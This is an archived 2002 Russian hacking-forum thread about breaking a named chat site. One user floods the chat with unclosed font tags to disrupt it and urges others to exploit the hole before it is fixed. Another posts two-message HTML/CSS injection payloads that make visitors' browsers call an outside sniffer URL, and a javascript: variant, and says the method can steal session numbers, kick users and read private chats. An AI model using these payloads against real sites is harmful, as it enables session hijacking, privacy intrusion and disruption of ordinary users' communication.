Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Взломан max!chat (на примере gaychat.ru) (https://forum.antichat.xyz/showthread.php?t=256)

50r 17.10.2002 00:20

www.gaychat.ru - заходите. регистрируетесь. входите в чат. и пишите что то типа

текст <font face=webdings> <font/><font/><font/><font/>

*<font/> - столько сколько хватит строки ввода.

эффект получается за счет не закрытого тэга фонта.. это надо видетьhttp://forum.antichat.ru/iB_html/non...cons/smile.gif) оччень эффектно!http://forum.antichat.ru/iB_html/non...cons/smile.gif) когда все последующие сообщения после вашего идут не слова и картинкиhttp://forum.antichat.ru/iB_html/non...cons/smile.gif) стоит повторить несколько раз подряд для достижения лучшего результата. и немного изменяйте фразу а то софт не пропускает одинаковые сообщения несколько раз подряд.

еще так же можно хделать тэги курсива и жирного шрифта.
в других чатах не пробовал... можно получится.

Юзайте пока дырку не прикрылиhttp://forum.antichat.ru/iB_html/non...cons/smile.gif)




Algol 17.10.2002 12:47

Нда... любопытный чатик....
Но ломается он намного круче чем просто глюки с фонтом..
Например его можно сниферить:
В два этапа , сначала посылем такое сообщение:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;a href=&quot;http://dsds.ds/?&quot;a=`&gt;input fdfs&lt;/a&gt;[/QUOTE]<span id='postcolor'>
И сразу же за ним еще одно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(http://www.hackzone.ru/cgi-bin/sniff.cgi?Algol)` [/QUOTE]<span id='postcolor'>
(сообщения нужно посылать именно такие, &quot;лишние&quot; пробелы не удалять &#33http://forum.antichat.ru/iB_html/non...icons/wink.gif

Результат как говорится на лице ....
(вернее в логе хакзоны, а для тех кто в танке: лог хак зоны http://www.hackzone.ru/files/snifflog.txt)

50r 17.10.2002 21:43

гмм... оригинално!:))
ну если как бэк можно вставить любой? урл, тооо... получается можно и скрипт какой то вставить или нет?
оччень очень интересная идЭя... :)

Algol 18.10.2002 11:30

ты видимо не читал мои статьи, поэтому тебе кажется это оригинальным...
На самом деле это старая технология , приспособленная к особенностям данного чата.
А насчет скриптов - как ты правильно понял если можно вставить снифер, то можно вставить и скрипт, и узнать номера сессий, и кикнуть , и залезть в приват.. В общем по полной программе....
Для вставки скрипта вместо второго сообщения можно послать например :
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(javascript:alert())` [/QUOTE]<span id='postcolor'>

Только советую эксперементирвать в привате , дабы не шокировать публику ...

50r 01.11.2002 01:09

а можно через скрипт менять размер шрифта? иль картинку вставлять?

17.10.2003 16:19

ПРИВЕТ ВСЕМ


Время: 12:51